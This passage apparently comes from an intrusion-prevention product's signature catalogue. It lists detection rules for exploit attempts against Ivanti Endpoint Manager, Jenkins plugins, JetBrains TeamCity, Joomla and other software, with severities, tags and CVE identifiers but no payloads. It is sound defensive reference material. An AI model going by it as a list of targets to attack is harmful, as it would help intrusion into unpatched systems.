First detected in: sgpkg-ips-1822-5242
Last changed: sgpkg-ips-1834-5242
Vulnerability: Ivanti-Endpoint-Manager-Serverasset-Updateassetinfo-SQL-Injection
Description:
Back to top

HTTP_CRL-Ivanti-Endpoint-Manager-Serverkbdmouse-LoadMouseTable-SQL-Injection-CVE-2024-32840

About this situation: An attempt to exploit a vulnerability in Ivanti Endpoint Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Endpoint Manager, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1848-5242
Last changed: sgpkg-ips-1848-5242
Vulnerability: Ivanti-Endpoint-Manager-Serverkbdmouse-LoadMouseTable-SQL-Injection
Description:
Back to top

HTTP_CRL-Ivanti-Endpoint-Manager-Servermotherboard-Loadmotherboardtable-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Ivanti Endpoint Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Endpoint Manager, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1795-5242
Last changed: sgpkg-ips-1795-5242
Vulnerability: Ivanti-Endpoint-Manager-Servermotherboard-Loadmotherboardtable-SQL-Injection
Description:
Back to top

HTTP_CRL-Ivanti-Endpoint-Manager-Servermotherboard-Loadslotstable-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Ivanti Endpoint Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Endpoint Manager, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1814-5242
Last changed: sgpkg-ips-1814-5242
Vulnerability: Ivanti-Endpoint-Manager-Servermotherboard-Loadslotstable-SQL-Injection
Description:
Back to top

HTTP_CRL-Ivanti-Endpoint-Manager-Serverstorage-Buildcdromtable-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Ivanti Endpoint Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Endpoint Manager, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1832-5242
Last changed: sgpkg-ips-1832-5242
Vulnerability: Ivanti-Endpoint-Manager-Serverstorage-Buildcdromtable-SQL-Injection
Description:
Back to top

HTTP_CRL-Ivanti-Endpoint-Manager-Vulcore.asmx-Getdbpatches-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Ivanti Endpoint Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Endpoint Manager, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1765-5242
Last changed: sgpkg-ips-1765-5242
Vulnerability: Ivanti-Endpoint-Manager-Vulcore.asmx-Getdbpatches-SQL-Injection
Description:
Back to top

HTTP_CRL-Ivanti-EPM-RecordGoodApp-SQLi-RCE

About this situation: An attempt to exploit a vulnerability in Ivanti Endpoint Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Ivanti Endpoint Manager, CVE2024, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1753-5242
Last changed: sgpkg-ips-1753-5242
Vulnerability: Ivanti-EPM-RecordGoodApp-SQLi-RCE
Description:
Back to top

HTTP_CRL-Ivanti-MobileIron-Sentry-Authentication-Bypass-CVE-2023-38035

About this situation: An attempt to exploit a vulnerability in Ivanti MobileIron Sentry detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti MobileIron Sentry, CVE2023, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1626-5242
Last changed: sgpkg-ips-1626-5242
Vulnerability: Ivanti-MobileIron-Sentry-Authentication-Bypass-CVE-2023-38035
Description:
Back to top

HTTP_CRL-Ivanti-Virtual-Traffic-Manager-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in Ivanti Virtual Traffic Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Ivanti Virtual Traffic Manager, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1765-5242
Last changed: sgpkg-ips-1776-5242
Vulnerability: Ivanti-Virtual-Traffic-Manager-Authentication-Bypass-CVE-2024-7593
Description:
Back to top

HTTP_CRL-Jason-Maloneys-Cgi-Guestbook-Command-Execution

About this situation: An attempt to exploit a vulnerability in Jason Maloney's CGI Guestbook was detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Jason Maloney's CGI Guestbook, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Vulnerability: Jason-Maloneys-Cgi-Guestbook-Command-Execution
Description:
Back to top

HTTP_CRL-JAWS-Command-Execution

About this situation: An attempt to exploit a vulnerability in JAWS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, JAWS, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1202-5242
Last changed: sgpkg-ips-1202-5242
Vulnerability: JAWS-Command-Execution
Description:
Back to top

HTTP_CRL-Jboss-Authentication-Bypass

About this situation: An attempt to exploit a Jboss Authentication Bypass vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, JBoss, CVE2007, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-740-5211
Last changed: sgpkg-ips-1343-5242
Vulnerability: Jboss-Authentication-Bypass
Description:
Back to top

HTTP_CRL-Jenkins-Active-Choices-Plugin-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Jenkins Active Choices Plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Jenkins, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1364-5242
Last changed: sgpkg-ips-1364-5242
Vulnerability: Jenkins-Active-Choices-Plugin-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Jenkins-Artifact-Repository-Parameter-Plugin-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Jenkins Artifact Repository Parameter Plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Jenkins Artifact Repository Parameter Plugin, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1344-5242
Last changed: sgpkg-ips-1730-5242
Vulnerability: Jenkins-Artifact-Repository-Parameter-Plugin-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Jenkins-Badge-Plugin-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Jenkins Badge Plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Jenkins Badge Plugin, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1430-5242
Last changed: sgpkg-ips-1754-5242
Vulnerability: Jenkins-Badge-Plugin-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Jenkins-Build-Monitor-View-Plugin-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Jenkins Build Monitor View Plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Jenkins, CVE2024, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1711-5242
Last changed: sgpkg-ips-1711-5242
Vulnerability: Jenkins-Build-Monitor-View-Plugin-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Jenkins-Build-With-Parameters-Plugin-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Jenkins Build With Parameters Plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Jenkins, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1338-5242
Last changed: sgpkg-ips-1748-5242
Vulnerability: Jenkins-Build-With-Parameters-Plugin-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Jenkins-Ci-Server-Build-metrics-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Jenkins build-metrics Plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Jenkins, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1204-5242
Last changed: sgpkg-ips-1204-5242
Vulnerability: Jenkins-Ci-Server-Build-metrics-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Jenkins-Ci-Server-Getorcreate-Policy-Bypass

About this situation: An attempt to exploit a vulnerability in Jenkins detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Jenkins, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1092-5242
Last changed: sgpkg-ips-1092-5242
Vulnerability: Jenkins-Ci-Server-Getorcreate-Policy-Bypass
Description:
Back to top

HTTP_CRL-Jenkins-Claim-Plugin-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Jenkins Claim Plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Jenkins, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1360-5242
Last changed: sgpkg-ips-1360-5242
Vulnerability: Jenkins-Claim-Plugin-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Jenkins-CLI-Deserialization

About this situation: An attempt to exploit a vulnerability in Jenkins CLI detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Linux, Any Hardware, Jenkins, CVE2017, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1368-5242
Last changed: sgpkg-ips-1368-5242
Vulnerability: Jenkins-CLI-Deserialization
Description:
Back to top

HTTP_CRL-Jenkins-Config-File-Provider-Plugin-External-Entity-Injection

About this situation: An attempt to exploit a vulnerability in Jenkins Config File Provider Plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Jenkins, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1368-5242
Last changed: sgpkg-ips-1754-5242
Vulnerability: Jenkins-Config-File-Provider-Plugin-External-Entity-Injection
Description:
Back to top

HTTP_CRL-Jenkins-Dashboard-View-Plugin-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Jenkins Dashboard View Plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Jenkins, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1351-5242
Last changed: sgpkg-ips-1351-5242
Vulnerability: Jenkins-Dashboard-View-Plugin-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Jenkins-Extra-Columns-Plugin-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Jenkins Extra Columns Plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Jenkins, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1370-5242
Last changed: sgpkg-ips-1370-5242
Vulnerability: Jenkins-Extra-Columns-Plugin-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Jenkins-File-Parameter-Plugin-Stashedfileparametervalue-Arbitrary-File-Write

About this situation: An attempt to exploit a vulnerability in Jenkins File Parameter Plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Jenkins, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1604-5242
Last changed: sgpkg-ips-1604-5242
Vulnerability: Jenkins-File-Parameter-Plugin-Stashedfileparametervalue-Arbitrary-File-Write
Description:
Back to top

HTTP_CRL-Jenkins-Generic-Webhook-Trigger-Plugin-External-Entity-Injection

About this situation: An attempt to exploit a vulnerability in Jenkins Generic Webhook Trigger Plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Jenkins Generic Webhook Trigger Plugin, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1368-5242
Last changed: sgpkg-ips-1368-5242
Vulnerability: Jenkins-Generic-Webhook-Trigger-Plugin-External-Entity-Injection
Description:
Back to top

HTTP_CRL-Jenkins-Junit-Plugin-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Jenkins JUnit Plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Jenkins JUnit Plugin, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1485-5242
Last changed: sgpkg-ips-1485-5242
Vulnerability: Jenkins-Junit-Plugin-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Jenkins-Matrix-Project-Plugin-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Jenkins Matrix Project Plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Jenkins Matrix Plugin, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1431-5242
Last changed: sgpkg-ips-1754-5242
Vulnerability: Jenkins-Matrix-Project-Plugin-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Jenkins-Pipeline-Build-Step-Plugin-Job-Name-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Jenkins Pipeline: Build Step Plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Jenkins, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1563-5242
Last changed: sgpkg-ips-1563-5242
Vulnerability: Jenkins-Pipeline-Build-Step-Plugin-Job-Name-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Jenkins-Plot-Plugin-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Jenkins Plot Plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Jenkins, CVE2021, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1504-5242
Last changed: sgpkg-ips-1754-5242
Vulnerability: Jenkins-Plot-Plugin-Stored-Cross-Site-Scripting
Jenkins-Repository-Connector-Plugin-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Jenkins-Script-Security-Plugin-Sandbox-Bypass-CVE-2019-1003029

About this situation: An attempt to exploit a vulnerability in Jenkins detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Jenkins, CVE2019, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1467-5242
Last changed: sgpkg-ips-1467-5242
Vulnerability: Jenkins-Script-Security-Plugin-Sandbox-Bypass-CVE-2019-1003029
Description:
Back to top

HTTP_CRL-Jenkins-Scriptler-Plugin-Parameter-Names-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Jenkins Scriptler Plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Jenkins Scriptler Plugin, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1366-5242
Last changed: sgpkg-ips-1366-5242
Vulnerability: Jenkins-Scriptler-Plugin-Parameter-Names-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Jenkins-Scriptler-Plugin-Script-Content-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Jenkins Scriptler Plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Jenkins Scriptler Plugin, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1366-5242
Last changed: sgpkg-ips-1366-5242
Vulnerability: Jenkins-Scriptler-Plugin-Script-Content-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Jenkins-Simple-Queue-Plugin-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Jenkins Simple Queue Plugin
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Jenkins, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1815-5242
Last changed: sgpkg-ips-1815-5242
Vulnerability: Jenkins-Simple-Queue-Plugin-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Jenkins-Stapler-Remote-Code-Execution-CVE-2018-1000861

About this situation: An attempt to exploit a vulnerability in Jenkins detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Jenkins, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1323-5242
Last changed: sgpkg-ips-1637-5242
Vulnerability: Jenkins-Stapler-Remote-Code-Execution-CVE-2018-1000861
Description:
Back to top

HTTP_CRL-Jenkins-Urltrigger-Plugin-External-Entity-Injection

About this situation: An attempt to exploit a vulnerability in Jenkins URLTrigger Plugin detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Jenkins, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1354-5242
Last changed: sgpkg-ips-1364-5242
Vulnerability: Jenkins-Urltrigger-Plugin-External-Entity-Injection
Description:
Back to top

HTTP_CRL-JetBrains-TeamCity-Agent-Distribution-CVE-2024-31138-Stored-XSS

About this situation: An attempt to exploit a vulnerability in JetBrains TeamCity detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, JetBrains TeamCity, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1716-5242
Last changed: sgpkg-ips-1716-5242
Vulnerability: JetBrains-TeamCity-Agent-Distribution-CVE-2024-31138-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-JetBrains-TeamCity-Authentication-Bypass-CVE-2024-27198

About this situation: An attempt to exploit a vulnerability in JetBrains TeamCity detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, JetBrains TeamCity, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1699-5242
Last changed: sgpkg-ips-1705-5242
Vulnerability: JetBrains-TeamCity-Authentication-Bypass-CVE-2024-27198
Description:
Back to top

HTTP_CRL-JetBrains-TeamCity-Avatar-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in JetBrains TeamCity detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, JetBrains TeamCity, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1568-5242
Last changed: sgpkg-ips-1645-5242
Vulnerability: JetBrains-TeamCity-Avatar-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-JetBrains-TeamCity-Backup-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in JetBrains TeamCity detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, JetBrains TeamCity, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1794-5242
Last changed: sgpkg-ips-1794-5242
Vulnerability: JetBrains-TeamCity-Backup-Directory-Traversal
Description:
Back to top

HTTP_CRL-JetBrains-TeamCity-Backup-History-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in JetBrains TeamCity detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, JetBrains TeamCity, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1798-5242
Last changed: sgpkg-ips-1798-5242
Vulnerability: JetBrains-TeamCity-Backup-History-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-JetBrains-TeamCity-Commit-Status-Publisher-Page-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in JetBrains TeamCity detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, JetBrains TeamCity, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1607-5242
Last changed: sgpkg-ips-1607-5242
Vulnerability: JetBrains-TeamCity-Commit-Status-Publisher-Page-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-JetBrains-TeamCity-Gitlab-Connection-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in JetBrains TeamCity detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, JetBrains TeamCity, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1605-5242
Last changed: sgpkg-ips-1605-5242
Vulnerability: JetBrains-TeamCity-Gitlab-Connection-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-JetBrains-TeamCity-Global-Settings-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in JetBrains TeamCity
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, JetBrains TeamCity, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1810-5242
Last changed: sgpkg-ips-1810-5242
Vulnerability: JetBrains-TeamCity-Global-Settings-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-JetBrains-TeamCity-Jspprecompilation-Authentication-Bypass-CVE-2024-23917

About this situation: An attempt to exploit a vulnerability in JetBrains TeamCity detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, JetBrains TeamCity, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1723-5242
Last changed: sgpkg-ips-1723-5242
Vulnerability: JetBrains-TeamCity-Jspprecompilation-Authentication-Bypass-CVE-2024-23917
Description:
Back to top

HTTP_CRL-JetBrains-TeamCity-Perforce-Connection-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in JetBrains TeamCity detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, JetBrains TeamCity, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1586-5242
Last changed: sgpkg-ips-1586-5242
Vulnerability: JetBrains-TeamCity-Perforce-Connection-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-JetBrains-TeamCity-SSH-Keys-Page-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in JetBrains TeamCity detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, JetBrains TeamCity, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1584-5242
Last changed: sgpkg-ips-1715-5242
Vulnerability: JetBrains-TeamCity-SSH-Keys-Page-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-JetBrains-TeamCity-Vault-Connection-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in JetBrains TeamCity detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, JetBrains TeamCity, CVE2025, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1838-5242
Last changed: sgpkg-ips-1838-5242
Vulnerability: JetBrains-TeamCity-Vault-Connection-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-JFusionPBX-Service-Edit-Command-Injection

About this situation: An attempt to exploit a vulnerability in FusionPBX detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Linux, Any Hardware, FusionPBX, CVE2019, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1352-5242
Last changed: sgpkg-ips-1352-5242
Vulnerability: FusionPBX-Service-Edit-Command-Injection
Description:
Back to top

HTTP_CRL-Jimureport-Freemarker-Server-Side-Template-Injection-CVE-2023-4450

About this situation: An attempt to exploit a vulnerability in JimuReport detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, JimuReport, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1836-5242
Last changed: sgpkg-ips-1836-5242
Vulnerability: Jimureport-Freemarker-Server-Side-Template-Injection-CVE-2023-4450
Description:
Back to top

HTTP_CRL-Joomla!-CMS-Multiple-SQL-Injection-Vulnerabilities

About this situation: An attempt to exploit a vulnerability in Joomla! detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Joomla, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1388-5242
Last changed: sgpkg-ips-1388-5242
Vulnerability: Joomla!-CMS-Multiple-SQL-Injection-Vulnerabilities
Description:
Back to top

HTTP_CRL-Joomla!-CMS-User-Notes-List-View-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Joomla! detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Joomla, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1129-5242
Last changed: sgpkg-ips-1129-5242
Vulnerability: Joomla!-CMS-User-Notes-List-View-SQL-Injection
Description:
Back to top

HTTP_CRL-Joomla!-CMS-Webservice-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in Joomla! CMS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Joomla, CVE2023, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1614-5242
